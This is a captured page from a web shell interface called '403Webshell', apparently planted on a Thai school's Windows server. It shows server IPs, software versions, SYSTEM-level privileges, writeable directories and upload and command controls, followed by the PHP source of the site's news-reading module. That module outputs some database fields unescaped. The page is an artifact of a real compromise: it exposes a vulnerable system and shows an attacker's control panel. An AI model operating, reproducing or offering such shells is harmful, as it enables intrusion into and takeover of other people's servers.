403Webshell
Server IP : 104.21.80.248  /  Your IP : 172.71.28.155
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  E:/Inetpub/www/myschool/ratchaborika/modules/news/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : E:/Inetpub/www/myschool/ratchaborika/modules/news/readnews.php
<script type="text/javascript">
function showemotion() {
	emotion1.style.display = 'none';
	emotion2.style.display = '';
}
function closeemotion() {
	emotion1.style.display = '';
	emotion2.style.display = 'none';
}

function emoticon(theSmilie) {

	document.form2.COMMENT.value += ' ' + theSmilie + ' ';
	document.form2.COMMENT.focus();
}
</script>
	<TABLE cellSpacing=0 cellPadding=0 width=100% height=420 border=0>
      <TBODY>
        <TR>
          <TD vAlign=top>

				<TABLE width="750" align=center cellSpacing=0 cellPadding=0 border=0 background="images/124.jpg">

<?
$_GET['id'] = intval($_GET['id']);
//แสดงข่าวสาร/ประชาสัมพันธ์ 
$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
$res[news] = $db->select_query("SELECT * FROM ".TB_NEWS." WHERE id='$_GET[id]' ");
$arr[news] = $db->fetch($res[news]);
$db->closedb ();
if(!$arr[news][id]){
	echo "<BR><BR><BR><BR><CENTER><IMG SRC=\"images/icon/notview.gif\" BORDER=\"0\" ><BR><BR><B>ไม่มีรายการข่าวสาร/ประชาสัมพันธ์นี้</B></CENTER><BR><BR><BR><BR>";
}else{
	$FileNewsTopic = "data/newsdata/".$arr[news][post_date].".txt";
	$file_open = @fopen($FileNewsTopic, "r");
	$content = @fread ($file_open, @filesize($FileNewsTopic));
	$Detail = stripslashes(FixQuotes($content));
	//ทำการเพิ่มจำนวนคนเข้าชม
	$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
	$q[Pageview] = "UPDATE ".TB_NEWS." SET pageview = pageview+1 WHERE id = '".$_GET[id]."' ";
	$sql[Pageview] = mysql_query ( $q[Pageview] ) or sql_error ( "db-query",mysql_error() );
	//ชื่อหมวดหมู่ 
	$res[category] = $db->select_query("SELECT * FROM ".TB_NEWS_CAT." WHERE id='".$arr[news][category]."' "); 
	$arr[category] = $db->fetch($res[category]);
	$db->closedb ();
?>
				<TR>
					<TD>
					<table width="700" border="0" cellspacing="0" cellpadding="0">
 <HR>
  <tr>
    <td width="60"><img src="data/newsicon/<?=$arr[news][post_date];?>.jpg" width="80" height="120" align="middle"class="topicicon"></td>
    <td width="500" align="left" valign="top"><B><FONT COLOR="#990000" >เรื่อง : <?=$arr[news][topic];?><br>ผู้เขียน : <?=$arr[news][posted];?><br>
					<?= ThaiTimeConvert($arr[news][post_date],"1","");?><br>เข้าชม : <?=$arr[news][pageview];?></FONT></B>
					<!-- AddThis Button BEGIN -->
<a class="addthis_button" href="http://www.addthis.com/bookmark.php?v=300&amp;pubid=ra-5091c8405642d729"><img src="http://s7.addthis.com/static/btn/v2/lg-share-en.gif" width="125" height="25" alt="Bookmark and Share" style="border:0"/></a>
<script type="text/javascript">var addthis_config = {"data_track_addressbar":true};</script>
<script type="text/javascript" src="http://s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5091c8405642d729"></script>
<!-- AddThis Button END --></td>
	 <td width="110" align="center" valign="top">
	 <?

if($_SESSION['admin_user']){
	//Admin Login Show Icon
?>
				  <a href="?name=admin&file=news&op=news_edit&id=<? echo $arr[news][id];?>"><img src="images/admin/edit.gif" border="0" alt="แก้ไข" >แก้ไข</a> 
				  <a href="javascript:Confirm('?name=admin&file=news&op=news_del&id=<? echo $arr[news][id];?>&prefix=<? echo $arr[news][post_date];?>','คุณมั่นใจในการลบหัวข้อนี้ ?');"><img src="images/admin/trash.gif"  border="0" alt="ลบ" >ลบ</a>
<?
}
?>
</td>
  </tr>
</table>

<hr>
					</TD>
				</TR>
				<TR>
					<TD>
					<BR>
					<?=$Detail;?>
					<BR><BR>
					</TD>
				</TR>
				<TR>
					<TD height="1" class="dotline"></TD>
				</TR>
				<TR>
					<TD>
					<B><FONT COLOR="#990000"><?=$arr[category][category_name];?> 5 อันดับล่าสุด</B></FONT><BR><BR>
<?
//แสดงข่าวสาร/ประชาสัมพันธ์ 5 อันดับล่าสุดของหมวดหมู่ 
$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
$res[cat_news] = $db->select_query("SELECT * FROM ".TB_NEWS." WHERE category='".$arr[category][id]."' ORDER BY id DESC LIMIT 5 ");
$rows[cat_news] = $db->rows($res[cat_news]); 
if(!$rows[cat_news]){
	echo "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ไม่มีรายการในประกาศหมวดหมู่นี้ ";
}
while($arr[cat_news] = $db->fetch($res[cat_news])){
?>
					&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<IMG SRC="images/icon/suggest.gif" BORDER="0" ALIGN="absmiddle"><A HREF="?name=news&file=readnews&id=<?=$arr[cat_news][id];?>" target="_blank"><?=$arr[cat_news][topic];?></A> <?= ThaiTimeConvert($arr[cat_news][post_date],"","");?><BR>
<?
}
$db->closedb ();
?>
					</TD>
				</TR>
<?
}
?>
			</TABLE>
			<br>
	<center>
<?
if($arr[news][enable_comment]){

	//Check Comment
	$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
	$res[comment] = $db->select_query("SELECT * FROM ".TB_NEWS_COMMENT." WHERE news_id='".$arr[news][id]."' ORDER BY id ");
	$count=0;
	while($arr[comment] = $db->fetch($res[comment])){
		$count  ++;
?>
			<TABLE cellSpacing=5 cellPadding=0 width=480 border=0 align="center" class="tablecomment">
			<TR>
				<TD><B><FONT COLOR="#990000">ความคิดเห็นที่ <?=$count;?></FONT></B>
				<?if($_SESSION['admin_user']){echo " <A HREF=\"?name=news&file=delete_comment&id=".$_GET[id]."&comment=".$arr[comment][id]."\"><IMG SRC=\"images/admin/trash.gif\" WIDTH=\"20\" HEIGHT=\"20\" BORDER=\"0\" ALIGN=\"absmiddle\"></A>";};?>
				<BR><?= ThaiTimeConvert($arr[comment][post_date],"1","1");?>
				</TD>
			</TR>
			<TR>
				<TD height="1" class="dotline"></TD>
			</TR>
			<TR>
				<TD><?=banword(CHANGE_EMOTICON(BBCODE($arr[comment][comment])));?></TD>
			</TR>
			<TR>
				<TD height="1" class="dotline"></TD>
			</TR>
			<TR>
				<TD><B><FONT COLOR="#990000">โดย : </FONT></B> <?=$arr[comment][name];?> &nbsp;&nbsp; <FONT COLOR="#990000"><B>ไอพี : </B></FONT><?=$arr[comment][ip];?>
				</TD>
			</TR>
			</TABLE>
			<BR>
<?
	}
	$db->closedb ();
?>
			<!-- Enable Comment -->
<?
if($_SESSION['user_user']){
//CheckUser($_SESSION['admin_user']);
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$res[admin] = $db->select_query("SELECT * FROM ".TB_ADMIN." WHERE username='".$_SESSION['admin_user']."' ");
		$arr[admin] = $db->fetch($res[admin]);
		?>
<?

//CheckUser($_SESSION['user_user']);
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE username='".$_SESSION['user_user']."' ");
		$arr[user] = $db->fetch($res[user]);
		?>
			<TABLE cellSpacing=0 cellPadding=0 width=500 border=0 align="center">
			  <TBODY>
				<TR>
				  <TD width="10" vAlign=top><IMG src="images/fader.gif" border=0></TD>
				  <TD width="490" vAlign=top><IMG src="images/topfader.gif" border=0><BR>
				  <IMG SRC="images/menu/textmenu_comment.gif" BORDER="0"><BR>
						<FORM NAME="form2" METHOD=POST ACTION="?name=news&file=comment&id=<?=$_GET[id];?>">
						<TABLE cellSpacing=5 cellPadding=0 width=450 border=0 align="center">
						<TR>
							<TD width=80 align=right><B>ไอคอน : </B></TD>
							<TD>
										<div id="emotion1">
									
										</div>


						<script language="JavaScript">
						function setURL()
						{
							var temp = window.prompt('ใส่ URL ที่คุณต้องการสร้างเป็นลิงค์','http://'); 
							if(temp) setsmile('[url]'+temp+'[/url]');
						}

						function setImage()
						{
							var temp = window.prompt('ใส่ URL ของรูปที่คุณต้องการให้แสดง','http://'); 
							if(temp) setsmile('[img]'+temp+'[/img]');
						}

						function setBold()
						{
							var temp = window.prompt('ใส่ข้อความที่คุณต้องการทำเป็นตัวหนา',''); 
							if(temp) setsmile('[b]'+temp+'[/b]');
						}
						function setLeft()
						{
							var temp = window.prompt('ใส่ข้อความที่คุณต้องการจัดซ้าย',''); 
							if(temp) setsmile('[left]'+temp+'[/left]');
						}
						function setCenter()
						{
							var temp = window.prompt('ใส่ข้อความที่คุณต้องการจัดกลาง',''); 
							if(temp) setsmile('[center]'+temp+'[/center]');
						}
						function setRight()
						{
							var temp = window.prompt('ใส่ข้อความที่คุณต้องการจัดขวา',''); 
							if(temp) setsmile('[right]'+temp+'[/right]');
						}
						function setsup()
						{
							var temp = window.prompt('ใส่ข้อความที่คุณต้องการทำเป็นตัวยก',''); 
							if(temp) setsmile('[sup]'+temp+'[/sup]');

						}
						function setsub()
						{
							var temp = window.prompt('ใส่ข้อความที่คุณต้องการทำเป็นตัวห้อย',''); 
							if(temp) setsmile('[sub]'+temp+'[/sub]');
						}
						function setglow()
						{
							var temp = window.prompt('ใส่ข้อความที่คุณต้องการทำเป็นตัวเรืองแสง',''); 
							if(temp) setsmile('[glow]'+temp+'[/glow]');
						}
						function setshadow()
						{
							var temp = window.prompt('ใส่ข้อความที่คุณต้องการทำเป็นตัวอักษรมีเงา',''); 
							if(temp) setsmile('[shadow]'+temp+'[/shadow]');
						}
						function setItalic()
						{
							var temp = window.prompt('ใส่ข้อความที่คุณต้องการทำเป็นตัวเอียง',''); 
							if(temp) setsmile('[i]'+temp+'[/i]');
						}

						function setUnderline()
						{
							var temp = window.prompt('ใส่ข้อความที่คุณต้องการให้มีเส้นใต้',''); 
							if(temp) setsmile('[u]'+temp+'[/u]');
						}

						function setColor(color,name)
						{
							var temp = window.prompt('ใส่ข้อความที่คุณต้องการให้เป็นสี'+name,''); 
							if(temp) setsmile('[color='+color+']'+temp+'[/color]');
						}
						function setWinamp()
						{
							var temp = window.prompt('ใส่ URL ของไฟล์เพลงที่ท่านต้องการแทรกในข้อความของท่าน','http://'); 
							if(temp) setsmile('[media]'+temp+'[/media]');
						}
						function setVideo()
						{
							var temp = window.prompt('ใส่ URL ของไฟล์วีดีโอคลิปที่ท่านต้องการแทรกในข้อความของท่าน','http://'); 
							if(temp) setsmile('[movie]'+temp+'[/movie]');
						}
						function setlink()
						{
							var temp = window.prompt('ใส่ URL ของเว็บไซต์ที่ต้องการทำลิงก์','http://'); 
							if(temp) setsmile('[url]'+temp+'[/url]');
						}
						function setEmail()
						{
							var temp = window.prompt('ใส่ อีเมล์ของท่าน',''); 
							if(temp) setsmile('[email]'+temp+'[/email]');
						}
						function setFlash()
						{
							var temp = window.prompt('ใส่ URL ของไฟล์ Flash ที่ท่านต้องการนำมาแสดง','http://'); 
							if(temp) setsmile('[flash=200,200]'+temp+'[/flash]');
						}


						function setsmile(what)
						{
							document.form2.COMMENT.value = document.form2.elements.COMMENT.value+" "+what;
							document.form2.COMMENT.focus();
						}
						</script>
						
							</TD>
						</TR>
						<TR>
							<TD width="80" align="right" valign=top><B>ความคิดเห็น : </B></TD>
							<TD><TEXTAREA NAME="COMMENT" ROWS="7" COLS="5" style="width:300"></TEXTAREA></TD>
						</TR>
						<TR>
							<TD width="80" align="right"><B>ผู้บันทึก : </B></TD>
						<TD><INPUT TYPE="text" NAME="POSTED" style="width:300" VALUE="<?=$arr[admin][name];?> <?=$arr[user][name];?> "  readonly style=\"color: #FF0000" ></TD><br>
						</TR>
<?
if(USE_CAPCHA){
?>
						<TR>
							<TD width="80" align="right">
							<?if(CAPCHA_TYPE == 1){ 
								echo "<img src=\"capcha/CaptchaSecurityImages.php?width=".CAPCHA_WIDTH."&height=".CAPCHA_HEIGHT."&characters=".CAPCHA_NUM."\" width=\"".CAPCHA_WIDTH."\" height=\"".CAPCHA_HEIGHT."\" align=\"absmiddle\" />";
							}else if(CAPCHA_TYPE == 2){ 
								echo "<img src=\"capcha/val_img.php?width=".CAPCHA_WIDTH."&height=".CAPCHA_HEIGHT."&characters=".CAPCHA_NUM."\" width=\"".CAPCHA_WIDTH."\" height=\"".CAPCHA_HEIGHT."\" align=\"absmiddle\" />";
							};?>
							</TD>
							<TD><input name="security_code" type="text" id="security_code" size="20" maxlength="6" style="width:80" > ใส่รหัสที่ท่านเห็นลงในช่องนี้ </TD>
						</TR>
<?
}
?>
						<TR>
							<TD width="80" align="right" valign=top></TD>
							<TD><INPUT TYPE="submit" value=" แสดงความคิดเห็น "><BR>
							</TD>
						</TR>
						</TABLE>
						</FORM>
				  </TD>
				</TR>
			  </TBODY>
			</TABLE>
	<?
}
 { 	  
?>
<? } ?>
			<!-- End Enable Comment -->
<?
}
?>

			<!-- End News -->
		  </TD>
        </TR>
      </TBODY>
    </TABLE>

Youez - 2016 - github.com/yon3zu
LinuXploit